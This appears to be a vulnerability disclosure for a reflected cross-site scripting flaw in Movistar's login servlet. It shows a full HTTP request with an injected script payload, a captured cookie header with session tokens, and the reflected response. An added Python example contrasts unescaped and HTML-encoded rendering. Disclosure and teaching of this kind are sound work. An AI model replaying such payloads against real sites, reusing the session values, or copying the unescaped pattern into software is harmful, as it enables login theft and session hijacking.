The vulnerable parameters are "xxxtipouserxxx", "xxxuserxxx" and "xxxpasswordxxx", and exploitation is through the GET method. Example:
-- REQUEST:
GET /sr/sso/pub/servlet/login?tipoUs=P&xxxtypeUserxxx=titular&xxxmethodxxx=post&xxxurixxx=https%3A%2F%2Fwww.movistar.es%2Fmimovistar-cliente%2Fes-es%2Fparticulares%2FpostLogin.html&xxxuserxxx=123456789&xxxpasswordxxx=aSD1231&xxxtipouserxxx=P"> HTTP/1.1
Host: www.movistar.es
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.movistar.es/mimovistar-cliente/es-es/particulares/login.html?ccliTokenSS=164adac9f5a559
Cookie: utag_main=v_id:0163bd2d2ba00013f7057242907404044007100900bd0$_sn:3$_ss:0$_st:1531923930124$_pn:24%3Bexp-session$ses_id:1531921591410%3Bexp-session; CSI_clicks_acum_particulares=0; TLTSID=fs2id47fzyq1527887245416; CSI_ultima_particulares=1527887249216; CSI_url_inicio_particulares=/t5/Ayuda-Gestiones-Contratos-y-Factura-Internet/dynamicip-rima-tde-net/td-p/3086562; CSI_page_name_inicio_particulares=comunidad%3Aportada%3Aforos%3Ainternet%3Aayuda-tarifas%3A.dynamicip.rima-tde.net; _ga=GA1.2.370576869.1527887249; JSESSIONID=tvN0bP2Lz7Vb8LY6h3mN2h2621vNFvnrxvfBh7wY2xXY7lVwT0dS!905856882; 7a5f68f5df444a4f87157280100000f7=en; USER_CLASS=519150693; COL=18071809964270AHOGes00002018071877777; SEG_NAV=particulares; SEG_NAV_ES=particulares; MI_MOVISTAR=NABAGNLNN; _gid=GA1.2.168189848.1531917965; __utma=151739813.370576869.1527887249.1531917965.1531921565.2; __utmc=151739813; __utmz=151739813.1531921565.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __mc=-4526385577924454000; _mc_uuid=118218df-d4ed-47d1-ad5c-57dda7321439; _mc_sessorigin=seo; _mc_sessid=1531917965470; IC_XCOL=; IC_XCOL_1=; gwIsp_i3=mov; gwIsp_i3_d=mov; optimizelyEndUserId=oeu1531917967732r0.5122833511510013; optimizelySegments=%7B%7D; optimizelyBuckets=%7B%7D; compruebaCkE=1; TS866899=e7efedca1d13dfc670d7bd1158242e7aadf07615246704f85b4f449b; check=true; mbox=PC#56aaa47249c843fd84f693af4a3ecfb8.26_16#1595162840|session#3e5366681fb742b7aec35779677e69bf#1531923989; gwIsp=mov; __utmb=151739813.4.9.1531921718694; woid=19d4d5c4-2028-97a7-9ea6-940257cd65f0; CCLIJSESSIONID=sf1zbPGXdf0Tp9bmD77RTf7ndJhpNpj2lzylJ0ztVvV3JS2KG4K2!-624340416; AMP_TOKEN=%24NOT_FOUND; _gat_tealium_0=1; _gat=1

-- RESPONSE:
HTTP/1.1 200 OK
Server: XXXXXX
Content-Length: 2920
X-ORACLE-DMS-ECID: 3cfcdc11-88a2-4d98-bb23-b5f86b7a6d30-00b80194
X-ORACLE-DMS-RID: 0
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<input name="xxxtipouserxxx" value="P"><script>prompt(1)</script>" type="hidden">
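
The response above shows the parameter value closing the value="..." attribute of a hidden input. The following is an added example, not code from the advisory or from the affected site: it renders the three parameters with and without HTML attribute encoding and parses both results to show where the value ends up. The function and class names are hypothetical, and the rendering template is an assumption modelled on the single input tag visible in the response.

```python
import html
from html.parser import HTMLParser

# Parameter names come from the advisory; everything else is hypothetical.
REFLECTED = ("xxxtipouserxxx", "xxxuserxxx", "xxxpasswordxxx")
FIELD = '<input name="%s" value="%s" type="hidden">'


def render_unsafe(params):
    """Reflect values verbatim into value="..." (the flawed pattern)."""
    return "".join(FIELD % (n, params.get(n, "")) for n in REFLECTED)


def render_safe(params):
    """Same markup, with each value HTML-attribute encoded first."""
    return "".join(
        FIELD % (n, html.escape(params.get(n, ""), quote=True)) for n in REFLECTED
    )


class TagAudit(HTMLParser):
    """Records the tags and input values an HTML parser sees."""

    def __init__(self):
        super().__init__()
        self.tags, self.values = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            attrs = dict(attrs)
            self.values[attrs.get("name")] = attrs.get("value")


def audit(markup):
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser


# Constructed input: the value reflected in the advisory's response.
SAMPLE = {
    "xxxtipouserxxx": 'P"><script>prompt(1)</script>',
    "xxxuserxxx": "123456789",
    "xxxpasswordxxx": "aSD1231",
}
```

With the encoded rendering, the parser sees three input elements and the full submitted string stays inside the value attribute; with the verbatim rendering, the value is cut at P and a script element appears in the document.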